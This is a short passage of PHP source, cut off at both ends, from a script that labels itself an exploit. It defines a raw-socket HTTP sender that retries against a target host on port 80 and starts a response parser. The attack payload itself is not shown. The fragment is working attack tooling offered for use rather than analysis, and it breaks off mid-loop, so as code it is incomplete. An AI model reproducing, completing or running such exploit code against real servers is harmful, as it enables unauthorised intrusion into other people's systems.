= 5 # this may take some minutes.. /* EXPLOIT */ error_reporting(0); ini_set("default_socket_timeout",30); set_time_limit(0); function http_send($host, $packet) { $sock = fsockopen($host, 80); $c = 0; while (!$sock) { if ($c++ == 10) die(); print "\n[-] No response from ".$host.":80 Trying again..."; $sock = fsockopen($host,80); sleep(1); } fputs($sock, $packet); $resp = ""; while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function getContent($resp) { $data = explode("\r\n\r\n", $resp); $content=""; for ($i=1; $i